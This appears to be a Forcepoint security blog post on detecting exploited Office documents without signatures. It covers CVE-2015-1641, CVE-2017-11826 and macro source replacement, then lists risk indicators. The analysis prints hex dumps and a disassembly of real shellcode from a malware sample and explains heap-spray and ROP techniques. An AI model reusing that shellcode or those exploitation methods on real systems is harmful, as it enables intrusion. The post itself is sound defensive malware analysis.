|
0 min read
Assessing risk in Office documents - Part 4: CVE and generic exploit detection
In part 4, the final part of this 4-part blog series, we’ll examine why and how exploits are used to get code running within Office documents and how we can find signs of Office documents being exploited without knowing about the actual vulnerability itself. We’ll walk through a few commonly exploited vulnerabilities and show you that knowledge about the exploit itself might not be needed. We’ll also investigate obfuscation used on macros and how we cannot always rely on what we see at first sight. At the end we’ll summarize what elements we’ve looked at in this series of blogs that raise risk within documents.
In case you missed part 1, part 2 and part 3, here is the background: Forcepoint Innovation Labs conducted a research project to see if we can evaluate risk associated with Microsoft Office documents without focusing on specific malware families. Anti-virus-engines need to be able to classify a document as malicious to block it, while we want to evaluate the level of risk a document carry without those constraints. Code, or the possibility of getting any code in any form, adds risk. If the level of risk is unacceptable we can then block/quarantine the document on our gateways.
As you progress through the blog series you will build up the knowledge to assess risk instead of depending on a clear AV engine conviction.
Why do attackers use exploits?
Attackers need to find a way of getting their code to run when a document is activated. Having macros or embedding executable code is quite noticeable, as is linking if you search in the right places. Exploiting vulnerabilities within the Office suite is harder to defend against on the gateway when documents are inspected. As we discussed in part 1, vulnerabilities are bugs in the software code. If they can be exploited to get code to run it becomes much more convenient for an attacker to get their code running inside your organization. If it’s an unknown vulnerability (0-day) being exploited it’s very hard to defend against at a gateway-level - or at all. We'll discuss that later when we discuss generic exploit detection.
Let’s take an example when you’re dealing with a document with no embedded executable content, no URLs and no macros to investigate.
Exploiting a known vulnerability means that at some stage, something inside the document is specifically modified in a way which will result in the application opening the document to behave the way the attacker wants. The real question is, what has been changed to achieve that. A normal document might have thousands of configuration settings. Binary streams that have records describing one area, XML with a lot of values and data, RTF with their structures and so on. How do you pinpoint which one will cause a problem? It could be as simple as setting a hexadecimal value to something Office doesn’t expect and causing Office to malfunction, but that’s just the very first step. Afterwards it needs to be able to transfer execution to code available from somewhere within the document file. This code needs to contain instructions the actual CPU understands, for example x86/x64 code.
CVE-2015-1641
Let’s follow a practical example. You are familiar with CVE-2017-11882 that we covered in part 3. The bug is a no-length-check being done on the filename copied into a buffer of just 40 bytes, and the code that will be executed is located within the same stream. This time we’ll follow another well-used vulnerability, CVE 2015-1641, which works in a different way (Sample 1). Note that the complete output of the objects found with our own research tool can be found in Appendix B.
We start this journey with an RTF file. That contains several objdata objects, but we’ll start with the first. This file contains an embedded OLE2 archive. Inside this OLE2 archive you’ll find a Root Entry/Package stream which is a ZIP archive:
Inside the ZIP we have a lot of XML files, which you normally have within any newer Word documents. The bug that has been exploited relates to SmartTag handling. If we search for the various SmartTags defined in these XML files, we find the bad one in word.document.12.objects/Root Entry/Package.objects/word/document.xml:
What’s different with this SmartTag compared to the others also present in the file? The difference is the “id”, “moveFromRangeStart”, “moveFromRangeEnd” and the “name”. Now we need to understand what the bug is. The problem is that this SmartTag entry tells Word to start using offset 0x09000808 (150997000 in decimal) as its stack. At some point Word will execute a “retn” instruction and now it’s up to this new stack to define where the CPU execution will continue. Why select 0x09000808? With Address Space Layout Randomization (ASLR), why did the malware author set the stack to this location? To start the answer, the malware use an ActiveX component called OTKLOADR.DLL. This DLL depends on a Microsoft C runtime library called MSVCR71.DLL which unfortunately doesn’t support ASLR. This means it will get loaded at a specific base-offset every time. It then uses ActiveX to perform a heap spray and maps single a binary blob (activeX52.bin) many times over in memory:
The file activeX52.bin is an OLE2 archive of 2095161 bytes which gets mapped into memory numerous times (filling up the buffer around the specified new stack ~0x09000000):
-ScanObject("ARCHIVE_FS" (1:"OLE2",2095616,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin")
-ScanObject("OLE2_FS" (0:"UNKNOWN",106,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin|Root Entry/Contents")
As you can see, the file itself is huge, but the “real” contents of it is small – only 106 bytes “Contents” stream. What do you think the rest is for? It’s the data/code needed to lead the execution to the shellcode.
If you didn’t know exactly what bug the malware author is abusing, what other elements could you have said are risky about this document?
- To start with, it uses a non-standard {\rtf1 opening, but sadly Office just checks the first 4-bytes ({\rt) and the rest isn’t validated.
- Some obfuscations done inside the RTF objdata structures, but it's not complex. Could be enough to say block – e.g.: {A\*\o b jdata {\*\AAAAAAAA 12345678901234567890 111111111111111}
- The RTF consist of many embedded OLE2 archives, you would probably get a lot of false-alarms if you block on that basis
- The fact that it uses an ActiveX component that uses a non-aware ASLR DLL. You’d need to research what ActiveX classes internally use what DLLs which are not ASLR aware – which is doable.
- Mapping the same (huge?) binary blob into memory at many different locations:
- The contents of this binary blob contains x86 code, and/or points to, in this case, 0x7C3761BB – inside the non-ASLR DLL MSVC71.DLL.
- The mapped OLE2 archive only contains a single file of a 106 byte stream, and has approximately 2MB of data/code unaccounted for.
- The fact that after the last '}' of the closing {\rtvpn opening, you find data. There shouldn’t be anything there.
So, even if you didn’t know about this specific vulnerability there are many signs saying this file is trying to exploita vulnerability and shouldn’t be allowed anywhere since it poses risk. VirusTotal say 42 or 58 engines detect this file, but ideally it should have been 100% since the vulnerability is from 2015.
CVE-2017-11826
Let’s look at another exploit, this time for CVE-2017-11826 (Sample 2). Again, we deal with an RTF file and as before the complete output from our research tool can be found in Appendix B.
To start with, let’s focus on the 2 Word documents we’ll find embedded:
-ScanObject("GENERIC_FS" (10:"RTF",560752,"d9fac68b6c49c485675d9141f375799d10572999")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",14385,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0")
-ScanObject("MEM_FS" (1:"OLE2",14336,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",53297,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1")
-ScanObject("MEM_FS" (1:"OLE2",53248,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12")
There are no macros, no linking and nothing directly attached that could be directly executable. We now need to check if this could be using an exploit. As we’ve mentioned before, we need 2 or 3 things to occur:
- A bug needs to be exploited so execution of some code can be carried out
- Redirection to this code must occur if it’s not a part of the buffer doing the exploitation
- The code itself, most likely a set of valid x86 instructions
Inside the RTF we find the following:
It’s using a COM object with a slightly obfuscated CLSID D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731. This corresponds to MSVBVM60.DLL (Visual Basic 6 runtime). This DLL does not use ASLR and will therefore load at a static location.
Another line from the output of our own tool is also very interesting:
Embedded into objdata_1, we find a “Package” that contains a Word Document that contains a new OLE2 archive (activeX1.bin). This is 2099200 bytes long (over 2 MB), but it only contains a root entry. Could we have a bug in our parser?
00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. .E.n.t.| 00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............| 00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................| 00000450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000470 00 00 00 00 03 00 00 00 40 00 00 00 00 00 00 00 |........@.......| 00000480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000004b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000004c0 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff |................| 000004d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000004f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
This is very suspicious as there is no file inserted in the OLE2 archive. Why would any legit program do this? In the “unused” area of this file we find some repeating data:
00003200 2b 0e 98 72 2b 0e 98 72 2b 0e 98 72 2b 0e 98 72 |+..r+..r+..r+..r| 00003210 2b 0e 98 72 2b 0e 98 72 2b 0e 98 72 2b 0e 98 72 |+..r+..r+..r+..r| 00003220 2b 0e 98 72 2b 0e 98 72 2b 0e 98 72 2b 0e 98 72 |+..r+..r+..r+..r| 00003800 cb 40 94 72 ec 83 88 08 cb 40 94 72 ec 83 88 08 |[email protected][email protected]....| 00003810 cb 40 94 72 ec 83 88 08 cb 40 94 72 ec 83 88 08 |[email protected][email protected]....| 00003820 cb 40 94 72 ec 83 88 08 cb 40 94 72 ec 83 88 08 |[email protected][email protected]....| 00003f30 cb 40 94 72 d0 10 94 72 8f 08 95 72 b0 dd 95 72 |[email protected]| 00003f40 90 8c 88 08 01 02 00 00 40 00 00 00 45 c0 a4 72 |[email protected]| 00003f50 89 2d 88 88 88 08 9b 9b 33 c9 64 8b 71 30 8b 76 |.-......3.d.q0.v| 00003f60 0c 8b 76 1c 8b 46 08 8b 7e 20 8b 36 81 3f 6b 00 |..v..F..~ .6.?k.| 00003f70 65 00 75 f0 8b f0 eb 57 60 8b de 56 8b 73 3c 8b |e.u....W`..V.s<.| 00003f80 74 1e 78 03 f3 56 8b 76 20 03 f3 33 c9 49 41 ad |t.x..V.v ..3.IA.|
If we try to disassemble this code (from offset 0x3f58) we get the following using “objdump -D -Mintel,i386 -b binary -m i386 activeX1.bin --start-address=0x3f58”:
3f58: 33 c9 xor ecx,ecx
3f5a: 64 8b 71 30 mov esi,DWORD PTR fs:[ecx+0x30]
3f5e: 8b 76 0c mov esi,DWORD PTR [esi+0xc]
3f61: 8b 76 1c mov esi,DWORD PTR [esi+0x1c]
3f64: 8b 46 08 mov eax,DWORD PTR [esi+0x8]
3f67: 8b 7e 20 mov edi,DWORD PTR [esi+0x20]
3f6a: 8b 36 mov esi,DWORD PTR [esi]
3f6c: 81 3f 6b 00 65 00 cmp DWORD PTR [edi],0x65006b
3f72: 75 f0 jne 0x3f64
3f74: 8b f0 mov esi,eax
3f76: eb 57 jmp 0x3fcf
3f78: 60 pusha
3f79: 8b de mov ebx,esi
3f7b: 56 push esi
3f7c: 8b 73 3c mov esi,DWORD PTR [ebx+0x3c]
3f7f: 8b 74 1e 78 mov esi,DWORD PTR [esi+ebx*1+0x78]
3f83: 03 f3 add esi,ebx
…
3fcf: 8b fc mov edi,esp
3fd1: c7 07 67 59 de 1e mov DWORD PTR [edi],0x1ede5967
3fd7: c7 47 04 00 00 00 00 mov DWORD PTR [edi+0x4],0x0
3fde: 8b ef mov ebp,edi
3fe0: e8 93 ff ff ff call 0x3f78
3fe5: 6a 40 push 0x40
3fe7: 68 00 30 00 00 push 0x3000
3fec: 68 00 00 50 00 push 0x500000
3ff1: 6a 00 push 0x0
3ff3: ff 17 call DWORD PTR [edi]
3ff5: 8b f8 mov edi,eax
3ff7: 8f 47 24 pop DWORD PTR [edi+0x24]
Clearly this is shellcode that an attacker wants to use. We see it going through the PEB (Process Environment Block) looking through one of the loader-lists for the DLL starting with “KE”; which is KERNEL32.DLL. From here on it’s "game on" for the malware. We know the malware wants code execution to end up here for it to deliver its payload. Once again, we can see that it maps activeX1.bin several times in memory:
If we count the number of activeX??.xml_rels it uses we find 40 instances of this 2MB binary mapped into the process space of Word. It’s definitely used to heap-spray the memory to prepare to use an exploit. At the end of the legit space of the RTF file, we find data appended to it too:
It's clearly a risky document. To understand what specific CVE it is using is secondary at this stage, but let’s examine what makes CVE-2017-11826 work. There is a bug in Office when it tries to render tags within the Office Open XML format. The tag:
The font name doesn’t look right. Let’s look at it in a hex-editor:
This will exploit the bug in Office, and via the known address space of MSVBVM60, the ROP chain and the shellcode execution, the attacker has a stable environment to run their payload. VirusTotal shows the detection of this file being 36 or 58 engines at the time of testing.
Once again, without too much knowledge of the vulnerability itself there are many signs that this file does contain an exploit and should be blocked on a gateway.
Malicious macros as source-code, p-code or executable code?
Office macro code can exist in 3 different forms. So far we have extracted the decompressed LZNT1 source-code. It doesn’t have to be present (although it has some limitations if it’s not there) and there could still be executable macro code running, causing risk to the organization. Office will “compile” the source-code lines into p-codes during creation in the editor. These p-codes will be stored in the module stream. The source-code is only used to recompile the p-code if the document is opened under a different VBA version than the author used when the document was generated (e.g. VBA5 and VBA7). That means if the source-code isn’t present - and Office needs to recompile because of a VBA version mismatch of version - it doesn’t work. If the p-code has been executed at least once it will be converted to execodes and stored in the __SRP_? streams. Presence of p-code, execodes or source code is a sign of code from macros being present that needs to be analysed, or removed if that complies with policy. They all add risk.
As our final example, let’s consider Sample 3:
-ScanObject("GENERIC_FS" (1:"OLE2",38400,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27")
-ScanObject("OLE2_FS" (21:"TEXT",367,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/PROJECT")
-ScanObject("OLE2_FS" (16:"VBAx_MACRO",10363,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/ThisDocument")
-ScanObject("OLE2_FS" (0:"UNKNOWN",522,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/dir")
-ScanObject("OLE2_FS" (0:"UNKNOWN",2681,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/_VBA_PROJECT")
-ScanObject("OLE2_FS" (0:"UNKNOWN",41,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/PROJECTwm")
-ScanObject("OLE2_FS" (0:"UNKNOWN",7280,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/1Table")
-ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/WordDocument")
-ScanObject("OLE2_FS" (0:"UNKNOWN",114,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.CompObj")
-ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.SummaryInformation")
-ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.DocumentSummaryInformation")
Nothing out of the ordinary here. We have a VBA/ThisDocument which contains the macro-source code. If we look at this source code, it decompress to:
Sub sbHello() MsgBox "Hello World!" End Sub
That doesn’t look very malicious does it? A function sbHello shows a message box “Hello World”. Maybe someone is testing something for the first time?
If we have a look at the identifiers present in the VBA_PROJECT stream - which was created by Word when the “original” macro was entered – it looks like this:
VBA_IDENTIFIERS: Word, VBA, Win16, Win32, Win64, Mac, VBA6, VBA7, Project1, stdole, Project, ThisDocument _Evaluate, Normal, Office, Auto_Open, Document, omVsI, GhHqwBBoV, TWgKXCEMpLNvAkL duWktH, zomnqaCVeYJhMzN, ifZKwUg, CreateObject, hCiSSPdnGWigF, Run, title, msg intResponse, MsgBox, Application, Quit
indeed it has an MsgBox identifier, but where is sbHello? Why is there an Auto_Open, CreateObject, Application, Run etc? It seems likely that the source-code has been replaced and the p-code present in this document could be up to no good. If we use an excellent tool from Vesselin Bontchev called pcodedmp you’ll see that the code compiled in the document (Appendix 4 – Sample 4) isn’t anything near as innocent as MsgBox (“Hello World”). In fact, it’ll use powershell.exe to probably carry out a download. This could be the work of a tool called EvilClippy; read about it here.
As I see it we have 2 challenges:
- If a source code is present we can match the VBA_PROJECT identifiers to the source-code. If we see that most of the identifiers are used, and that the source doesn’t use identifiers not present in the VBA_PROJECT, one can assume the source code to be accurate. Our research tool calculates the match of the source code presence vs the Identifiers, and the number of identifiers being actually used compared to the source and hence it’s easy to identify that there is a mismatch and the document carries code that causes too much risk (SourcePCode_Match:50.00|SourcePCode_Unused:96.00).
- If the source-code is totally removed and you only have the p-code to analyse you need to implement a similar functionality as Vessenlin Bontchev implemented in his pcodedmp and base your detection on this rather than the source-code. In fact, this is something you should start doing right now anyway (as you’ll see below)!
A check on VirusTotal shows us that 4 out of 60 engines detect this as malicious. This is clearly an area of improvement for the other 56 engines (also you can see signs that Vesselin worked at F-prot (now Cyren) some time ago).
Conclusion
Detecting documents that have exploits can be hard. It helps if there is a corresponding known vulnerability so you can pinpoint exactly what error in the document will make Office malfunction. In many cases there are signs you can use to say a document is exploited, as we’ve seen with both CVE-2017-11826 and CVE-2015-1641. If you decompile the documents to the lowest level you will find clear indicators that the file is exploited without knowing exactly what bug it’s trying to utilize.
To summarize a few indicators of risk we have discussed:
- VBA macros are present (in any form, and validate that source code matches the executable format – or check the p-code directly!)
- Embedded objects carry direct executable content (*.exe, *.js, *.vbs etc)
- Any object that contains any kind of code/logic capability, e.g. PDF AcroForms.
- Some kind of linking is done towards non-whitelisted domains/URLs
- Obfuscation done on at any level in an attempt to hide real content
- Slack-space in RTF files or OLE2 archives being present indicate risk. Additionally presence of large binary blobs not having any special use (or containing repeating content).
- Use of components not compatible with ASLR, or known to be used by malicious actors
- Mapping up binary content that contain shellcode in memory
- Any data-stream containing shellcode (or valid x86 code)
- Strange "cocktails" of objects embedded into other objects
Documents that carry risk your organization isn’t willing to take can take 2 paths:
- Block
- Quarantine – it’s not delivered and will be quarantined for deeper analysis
- Clean - attempt to remove only the risky elements
- Perform document sanitation – only know good elements from a document is brought over to a new instance to remove traces of malicious intent, which in essence means (re)building a new document with the old visual contents.
We hope you have enjoyed our tutorial on assessing risk in Office documents and hope it has given you insights on how to control risk of documents within your organization. Please talk to us if you need our help!
Appendix A
Sample 1 - 72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9 Sample 2 - d9fac68b6c49c485675d9141f375799d10572999 Sample 3 - cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27
Appendix B
Full example of sample 1
-ScanObject("GENERIC_FS" (10:"RTF",1162424,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",32308,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0")
-ScanObject("MEM_FS" (1:"OLE2",32256,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12")
-ScanObject("OLE2_FS" (0:"UNKNOWN",114,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
-ScanObject("OLE2_FS" (7:"ZIP",29272,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package")
-ScanObject("ARCHIVE_FS" (5:"XML",1097,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",640,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",47230,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",7595,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",2488,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/header1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",52893,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/numbering.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",4664,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",169305,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",8714,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1857,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",7917,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
-CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
-ScanObject("ARCHIVE_FS" (5:"XML",630,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
-ScanObject("OLE2_FS" (0:"UNKNOWN",6,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
-ScanObject("GENERIC_FS" (0:"UNKNOWN",1,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|object_1")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",47157,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2")
-ScanObject("MEM_FS" (1:"OLE2",47104,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12")
-ScanObject("OLE2_FS" (0:"UNKNOWN",114,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
-ScanObject("OLE2_FS" (7:"ZIP",44085,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package")
-ScanObject("ARCHIVE_FS" (5:"XML",720,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",629,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX10.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX11.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX12.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX13.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX14.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",468,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX15.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX16.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX17.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX18.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX19.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX2.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX20.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX21.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX22.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX23.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX24.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX25.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX26.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX27.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX28.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX29.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX3.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",469,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX30.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX31.xml")
